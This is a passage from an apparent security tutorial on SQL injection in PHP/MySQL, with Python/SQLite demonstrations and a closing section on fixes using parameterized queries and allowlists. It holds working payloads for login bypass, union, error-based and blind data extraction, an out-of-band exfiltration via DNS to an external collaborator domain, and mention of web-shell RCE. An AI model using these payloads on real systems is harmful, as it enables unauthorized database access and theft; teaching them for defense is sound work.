SQL Injection (SQLi) is a type of code injection in which an attacker can manipulate the SQL queries that an application sends to a database. It is a well-known problem that has been discussed since at least 1998 and still affects many applications.
Injection flaws (SQL, NoSQL, OS command, LDAP, and others) rank first in the OWASP Top Ten 2017, the latest version, at the time of writing, of a document that lists the biggest security risks for web applications.
In fact, a SQL Injection opens the door to a series of dangerous attacks. For example, an attacker can gain read and write control over a database and, in some cases, achieve Remote Command Execution (RCE) on the machine, as we’ll see below.
It is important to point out that this problem is not restricted to a specific language or database. That said, all of the examples demonstrated here use PHP and MySQL, by choice of the author.
Understanding the SQLi
Let’s go to our first example. Take into account the vulnerable code snippet below:
At first glance, we can see that this code implements authentication. It receives a credential (username and password) and uses it to try to retrieve the user’s data from the database. Since the values provided by the user are used directly to build the SQL query, without any kind of sanitization, this example is vulnerable to SQL Injection.
To exploit the flaw shown in example 1, an attacker can submit the values admin' -- and password123 as credentials. The ' character (single quote) closes the string that originally contained the username, and the comment sign -- (two hyphens followed by a space) causes the resulting SQL query, illustrated below, to skip the password check, thus allowing authentication with only the username:
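The original snippet is PHP and MySQL; what follows is only a rough Python and SQLite sketch of the same flaw, not the author's code. The users table, its contents, and the vulnerable_login helper are assumptions made for illustration.

```python
import sqlite3


def make_db():
    # Hypothetical schema and data, used only for this demonstration.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 's3cret')")
    return conn


def vulnerable_login(conn, username, password):
    # The flaw: user input is concatenated straight into the SQL text.
    query = (
        "SELECT username FROM users "
        f"WHERE username = '{username}' AND password = '{password}'"
    )
    return query, conn.execute(query).fetchone()


conn = make_db()

# Wrong password, no injection: no row comes back.
print(vulnerable_login(conn, "admin", "password123"))

# The quote closes the string and "-- " comments out the password check.
print(vulnerable_login(conn, "admin' -- ", "password123"))
```

Printing the query next to the result makes it easy to see that everything after the comment sign, including the password condition, is ignored by the database.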
In example 2, the code searches for a document that belongs to the user and matches the id they entered.
Since the query is also built from the user’s input without any kind of sanitization, an attacker can submit the value 1 OR 1=1 in the id field, resulting in a WHERE clause that is always true and, consequently, in all documents being returned. This not only lets the attacker access other users’ documents but, depending on the amount of data stored, can also cause a denial of service (DoS).
SELECT * FROM documents WHERE user_id=42 AND id = 1 OR 1=1
-- the query above is equivalent to:
SELECT * FROM documents
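The effect of the always-true condition can be reproduced with a small Python and SQLite sketch. The documents table, its rows, and the find_document helper are assumptions for illustration, standing in for the PHP and MySQL code of the example.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE documents (id INTEGER, user_id INTEGER, name TEXT)")
conn.executemany(
    "INSERT INTO documents VALUES (?, ?, ?)",
    [(1, 42, "doc1"), (2, 42, "doc2"), (3, 7, "payroll"), (4, 8, "contract")],
)


def find_document(doc_id, user_id=42):
    # The id is pasted into the query text without any treatment.
    query = f"SELECT * FROM documents WHERE user_id={user_id} AND id = {doc_id}"
    return conn.execute(query).fetchall()


legit = find_document("1")            # only the requested document
injected = find_document("1 OR 1=1")  # every row, including other users' documents

print(len(legit), len(injected))
```

Because AND binds tighter than OR, the condition is read as (user_id=42 AND id = 1) OR 1=1, which is why the user_id filter no longer protects anything.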
It is worth pointing out that SQLi is not limited to SELECT; it can occur in other statements such as INSERT, UPDATE, and DELETE. In addition, by analyzing the functionality the application provides, it is often easy to deduce which statement was used.
Example 3 is a feature that creates documents. In this case, if an attacker enters the value opa.doc",user()); -- in the name field, a document named opa.doc is created whose content is the result of the user() function.
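An injection into an INSERT can be sketched the same way in Python and SQLite. This is an adaptation under stated assumptions: the documents table and the create_document helper are hypothetical, the string is delimited with single quotes, and SQLite's sqlite_version() stands in for MySQL's user(), so the payload differs slightly from the one in the text.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE documents (name TEXT, content TEXT)")


def create_document(name):
    # The name is concatenated into the INSERT; the content is fixed by the app.
    query = f"INSERT INTO documents (name, content) VALUES ('{name}', 'empty')"
    conn.execute(query)
    return query


create_document("report.doc")

# The payload closes the name string, supplies its own second value,
# closes the VALUES list and comments out what the application appended.
create_document("opa.doc', sqlite_version()) -- ")

rows = conn.execute(
    "SELECT name, content FROM documents ORDER BY rowid"
).fetchall()
print(rows)
```

The second row ends up with content chosen by the attacker (the result of a database function) instead of the value the application intended to store.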
So far, we have seen simple ways to exploit a SQL Injection. Next, we will see more advanced strategies that can be used according to the properties of each system.
Union-based
SQL has the UNION operator, which combines the results of multiple SELECT statements. So, when an injection occurs in a SELECT, this operator can be used, in a technique known as Union-based, to append a new query.
However, to use UNION, the second query must return the same number of columns as the original query, and the columns must have compatible data types. This can be solved by trial and error, padding the second query with null values until the column count matches, as you can see below in an exploitation of example 2:
In addition, UNION can be used together with other techniques, as shown in Image 12. It may also require knowing the names of the database tables and columns, which can be obtained by reading standard tables that contain this information (information_schema.tables in MSSQL and MySQL, all_tables in Oracle).
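The trial-and-error step can be sketched in Python against SQLite, used here as a stand-in for the PHP and MySQL setup. The tables, their contents, and the find_document and count_columns helpers are assumptions for illustration. SQLite is loosely typed, so only the column count matters in this sketch; stricter databases would also enforce compatible types.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE documents (id INTEGER, user_id INTEGER, name TEXT)")
conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
conn.execute("INSERT INTO documents VALUES (1, 42, 'doc1')")
conn.execute("INSERT INTO users VALUES ('admin', 's3cret')")


def find_document(doc_id):
    # Same vulnerable pattern as example 2: input concatenated into the query.
    query = f"SELECT * FROM documents WHERE user_id=42 AND id = {doc_id}"
    return conn.execute(query).fetchall()


def count_columns(max_columns=10):
    # Add one null at a time until the UNION stops raising an error.
    for n in range(1, max_columns + 1):
        payload = "0 UNION SELECT " + ", ".join(["null"] * n)
        try:
            find_document(payload)
            return n
        except sqlite3.OperationalError:
            continue
    return None


columns = count_columns()

# With the column count known, the nulls can be swapped for real columns.
leaked = find_document("0 UNION SELECT null, username, password FROM users")
print(columns, leaked)
```

Using an id that matches nothing (0) keeps the original rows out of the result, so only the injected query's output is returned.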
Stacked Queries
Stacked queries is the name of a feature that allows multiple SQL statements to be executed in a single call. When exploiting an SQLi flaw, it is possible to use the ; (semicolon) operator to end the original query and then start a new one.
However, this method does not always show the result of the injected query, since the application may have been developed to return the output of only one query. Therefore, it can be useful to combine it with other techniques, such as Out-of-Band, which will be discussed later. In addition, stacked queries are not supported everywhere: MSSQL accepts them, Oracle does not, and in MySQL they work only when the application uses a multi-statement API such as mysqli_multi_query (the mysqli_query function runs a single statement per call).
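Whether a stacked payload runs often depends on the API the application calls. The following Python and SQLite sketch illustrates that idea by analogy only: sqlite3's execute accepts a single statement, while executescript accepts several. The table and payload are assumptions for illustration.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE documents (id INTEGER, name TEXT)")
conn.execute("INSERT INTO documents VALUES (1, 'doc1')")

# The semicolon ends the original SELECT and starts an injected statement.
payload = "1; INSERT INTO documents VALUES (99, 'injected')"
query = f"SELECT * FROM documents WHERE id = {payload}"

try:
    conn.execute(query)  # single-statement API
    single_statement_api = "accepted"
except (sqlite3.Warning, sqlite3.ProgrammingError):
    # Python raises one of these, depending on the version.
    single_statement_api = "rejected"

# A multi-statement API runs both statements, but returns no rows to the caller.
conn.executescript(query)

names = [row[0] for row in conn.execute("SELECT name FROM documents ORDER BY id")]
print(single_statement_api, names)
```

Note that the multi-statement call gives nothing back to the caller, which mirrors the point above: the injected statement runs, but its output is not shown.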
Error-based
When an application exposes database error messages, the Error-based technique can take advantage of these messages to extract data.
Consider the vulnerable code below:
When characters that break the query are inserted, database error messages appear in the application’s response.
To perform this type of exploitation, the database in use needs to be considered. In MySQL, we can force an error message in its XML parser through the extractvalue function, which expects an XML document in the first parameter and, in the second, an XPath expression used to look up a value in that XML.
Since XPath has a well-defined syntax, it is possible to start the expression with an unexpected character, such as a period (.), and concatenate it with a valid query, whose result will then be displayed in the error message. See the following case:
Blind SQL Injection
When a vulnerable web application includes neither the result of SQL queries nor database error messages in its responses, the SQL Injection is categorized as blind, hence the name Blind SQL Injection.
As illustrated below, this scenario can be reproduced with a small modification to example 4:
In the next few topics, we’ll look at the subtypes of Blind SQL Injection.
Boolean-based
In example 5, the application searches for documents by name and behaves differently depending on whether they exist. In this case, the Boolean-based technique is useful: it takes advantage of the difference in responses to evaluate expressions and thereby extract information.
By submitting the name of a document that already exists in the application (doc1), followed by an AND operator and an expression to be evaluated, it is possible to discover the result of that expression character by character, as presented below:
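The character-by-character loop can be sketched in Python against SQLite. This is a minimal illustration under assumptions: the tables, the document_exists function (which plays the role of the application's "found / not found" response), and the extract helper are all hypothetical, and a subquery on a users table stands in for the expression being read.

```python
import sqlite3
import string

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE documents (name TEXT)")
conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
conn.execute("INSERT INTO documents VALUES ('doc1')")
conn.execute("INSERT INTO users VALUES ('admin', 's3cret')")

ALPHABET = string.ascii_letters + string.digits


def document_exists(name):
    # The only thing the "application" reveals: whether a row was found.
    query = f"SELECT name FROM documents WHERE name = '{name}'"
    return conn.execute(query).fetchone() is not None


def extract(expression, max_length=32):
    recovered = ""
    for position in range(1, max_length + 1):
        for candidate in ALPHABET:
            # The final quote is left open; the application's own quote closes it.
            payload = (
                f"doc1' AND substr(({expression}), {position}, 1) = '{candidate}"
            )
            if document_exists(payload):
                recovered += candidate
                break
        else:
            # No candidate matched: the end of the value was reached.
            break
    return recovered


secret = extract("SELECT password FROM users WHERE username = 'admin'")
print(secret)
```

Each request answers a single yes/no question, so the number of requests grows with the length of the value and the size of the alphabet; a binary search over character codes would reduce it.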
Time-based
Moving on to our sixth vulnerable example, this time the application always presents the same response, regardless of the value submitted by the user. To achieve this, the mysqli_fetch_array and die functions from the previous example have been removed, as shown below:
Therefore, the application’s response does not depend on the SQL query, which makes it necessary to use another source of information for exploitation, the response time, with a technique known as Time-based.
The idea behind Time-based is similar to the Boolean-based technique; however, it now requires a function that sleeps (creating a difference in the response time) depending on the result of the evaluated expression.
MySQL has the IF function, which receives an expression to evaluate as its first argument and returns the second or the third argument according to the result. Thus, it is possible to perform Time-based exploitation, as shown below:
In the image above, we can see that when the IF condition is false, the sleep function increases the response time by 2 seconds; when it is true, the response arrives in its normal time. This difference in behavior makes it possible to identify the first character returned by the user() function, 'r'.
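The timing idea can be sketched in Python and SQLite under several assumptions. SQLite has neither sleep nor IF, so a sleep function is registered from Python and CASE WHEN plays the role of IF; the tables, the search function, and the is_true helper are hypothetical. In this sketch the delay is triggered when the guessed condition is true, and it is kept very short so the example runs quickly.

```python
import sqlite3
import time

DELAY = 0.05  # seconds; real attacks typically use whole seconds

conn = sqlite3.connect(":memory:")
# Stand-in for the database's sleep function (assumption: SQLite has none).
conn.create_function("sleep", 1, lambda seconds: time.sleep(seconds) or 0)
conn.execute("CREATE TABLE documents (name TEXT)")
conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
conn.execute("INSERT INTO documents VALUES ('doc1')")
conn.execute("INSERT INTO users VALUES ('admin', 's3cret')")


def search(name):
    # The response is always the same, whatever the query returns.
    conn.execute(f"SELECT name FROM documents WHERE name = '{name}'").fetchall()
    return "OK"


def is_true(condition):
    # Sleep only when the condition holds, then measure the response time.
    payload = (
        f"doc1' AND (CASE WHEN {condition} THEN sleep({DELAY}) ELSE 0 END) = 0 -- "
    )
    start = time.perf_counter()
    search(payload)
    return time.perf_counter() - start >= DELAY / 2


first_char = "substr((SELECT password FROM users WHERE username = 'admin'), 1, 1)"
print(is_true(f"{first_char} = 's'"), is_true(f"{first_char} = 'x'"))
```

The is_true helper can replace the "found / not found" check of the Boolean-based technique, which is why the two approaches share the same extraction loop.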
Out-of-Band
Finally, we come to the last exploitation example, in which the vulnerable spot does not even allow the SQL query time to be measured. This can be reproduced by modifying the mysqli_query call used in example 6, as presented below:
In this example, the functionality is asynchronous, which means that the application does not wait for the query to finish in the database before answering the user. So, it is necessary to try a set of techniques known as Out-of-Band, which retrieve the attack data through a communication channel different from the one used to carry out the attack.
A good option is to create a query that, when executed, sends its result to an external server on the internet. Although MySQL does not directly implement a function for this type of communication, it does provide file manipulation features, which on Windows use the CreateFile function.
CreateFile is a Windows API function that, as used by MySQL, allows access not only to files on the machine itself (in this case, the server running MySQL) but also to files on the network. This means that when MySQL is running on Windows, it is possible to create a query that sends data over the internet, as shown below:
In image 10, through the load_file function, MySQL tries to read a file from the hrcxgmpghhpj6spml8g1nklullrff4.burpcollaborator.net domain using the SMB protocol; however, it first needs to perform a DNS lookup for that domain. During this lookup, the value of @@version is sent to a DNS server as if it were a subdomain name, which can be seen in the following image:
Even though the previous exploitation cannot be performed on Linux distributions, it is still possible to manipulate local files, which is not restricted to one operating system. In this scenario, if the machine is running a web server and the database can write to one of its directories, the result of a query can be saved to a file and accessed later, as presented below:
An even more interesting option in this case is to use the file write permission to obtain RCE. For that, it is enough to write code in a language supported by the web server (in our example, PHP) that executes a command sent by the user on the target’s operating system and presents the result, that is, the payload of a web shell.
At this point, one might think that Out-of-Band techniques are always the best option, at least for Blind SQL Injection. However, that’s not true, since many factors can make them impractical, such as the lack of permission to write into directories. In MySQL, this can be caused by a restrictive value in the secure_file_priv variable (which is already the installation default), the lack of the FILE privilege for the database user, or the lack of write permission for the operating system user that runs the database.
So, when it comes to exploiting SQLi, “silver bullets” don’t really exist; instead, there are several techniques, each ideal for a specific place and time.
Sqlmap
Sqlmap is a well-known open-source tool, written in Python, for identifying and exploiting SQL Injection. It is very useful for automating attacks because it makes it simple, for example, to exploit a spot that requires the Time-based technique, abstracting all the work needed to read each character.
So, let’s see sqlmap applied to example 6, which was previously exploited with the Time-based technique:
The --dump and --stop 3 options, respectively, retrieve data from the database tables and limit the retrieval to 3 entries.
The -u option (short for --url) defines the target; for more complex cases it can be replaced by -r, followed by the path of a file containing the HTTP request to be sent.
Also, by default, sqlmap already tests all the parameters in the URL of a GET request and in the body of a POST request, but it is possible to specify other injection points.
Correction
When the goal is to fix SQL Injection, the best solution is parameterized queries, also called prepared statements.
Parameterized queries let the application define in advance the structure of the operations that will be performed in the database. They are not exclusive to any one technology and, when used, they must indicate where the user’s input will be inserted with a placeholder. This way, it is possible to completely fix SQLi flaws, as we can see in the case shown in example 1, which is now corrected:
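As a rough equivalent of that correction, here is a Python and SQLite sketch of a login that uses placeholders. The users table and the login helper are assumptions for illustration; sqlite3 marks placeholders with ?, and the values are passed separately from the SQL text.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
# Hypothetical data; a real application would store password hashes instead.
conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
conn.execute("INSERT INTO users VALUES ('admin', 's3cret')")


def login(username, password):
    # The query structure is fixed; each ? marks where a value will be bound.
    query = "SELECT username FROM users WHERE username = ? AND password = ?"
    return conn.execute(query, (username, password)).fetchone()


print(login("admin", "s3cret"))            # valid credentials
print(login("admin' -- ", "password123"))  # the payload is treated as plain data
```

With the values bound as parameters, the quote and the comment sign are compared literally against the username column, so the injection attempt simply matches no user.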
Additionally, parameterized queries can also improve performance. That’s because handling an SQL query involves several steps. Basically, the query is first checked to verify that it makes sense (syntax and semantics); then it is compiled into a form that the machine understands; and finally it is executed.
All of these steps are repeated every time a standard query runs. With parameterized queries, the database can store the code generated for each operation and go directly to the execution step. Since compilation is not performed again, all placeholders are processed purely as data, sent through a binary protocol, unlike standard queries, in which the complete query text is sent to the database. Therefore, user data cannot change the logic of the query and thus cause SQL injections. However, this also limits the parts of the query that can receive user input. For example, in an application that uses data sent by the user directly as the column in ORDER BY, it would not be possible to use parameterized queries for that value.
To solve this, it is possible to use an “allowlist” that restricts the data received, accepting only a known and limited set of values and preventing malicious SQL from being injected. The code below illustrates this solution in a feature that lists users:
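A minimal Python and SQLite sketch of the allowlist idea follows. The users table, the set of permitted column names, and the list_users helper are assumptions for illustration and do not reproduce the author's PHP code.

```python
import sqlite3

# Only these exact values may ever reach the ORDER BY clause.
ALLOWED_ORDER_COLUMNS = {"id", "username"}

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (id INTEGER, username TEXT)")
conn.executemany("INSERT INTO users VALUES (?, ?)", [(1, "zoe"), (2, "adam")])


def list_users(order_by="id"):
    # Anything outside the allowlist is rejected before the query is built.
    if order_by not in ALLOWED_ORDER_COLUMNS:
        raise ValueError(f"unsupported sort column: {order_by!r}")
    # Safe to interpolate: the value is one of our own known constants.
    return conn.execute(f"SELECT id, username FROM users ORDER BY {order_by}").fetchall()


print(list_users("username"))

try:
    list_users("id; DROP TABLE users")
except ValueError as error:
    print(error)
```

Rejecting unknown values outright, rather than trying to clean them, keeps the check simple: the query can only ever contain text the developer wrote.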
The image below shows example 9 in operation:
Finally, it is important to remember that all external data received from third parties is dangerous and, therefore, should never be used to build an SQL query without the proper treatment addressed here.
See you soon!